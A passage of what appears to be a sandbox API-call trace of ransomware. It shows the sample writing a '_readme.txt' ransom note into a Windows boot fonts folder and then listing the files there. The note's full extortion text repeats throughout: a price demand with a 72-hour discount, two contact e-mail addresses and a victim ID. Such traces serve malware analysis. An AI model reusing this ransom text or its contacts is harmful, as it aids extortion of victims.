lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.750] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0142.750] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.750] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.750] PathFindFileNameW (pszPath="") returned="" [0142.750] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.751] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.751] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.751] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.751] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0142.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.751] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0142.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.752] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.752] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.752] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.754] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.754] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.755] CloseHandle (hObject=0x6f0) returned 1 [0142.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.756] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8b00e30, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b00e30, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.756] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8b00e30, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b00e30, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.756] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0142.756] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0142.756] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0142.756] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0142.756] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0142.756] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b00e30, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8b00e30, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b00e30, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.756] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b00e30, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8b00e30, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b00e30, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.756] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.756] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.759] HeapFree (in: hHeap=0x620000, 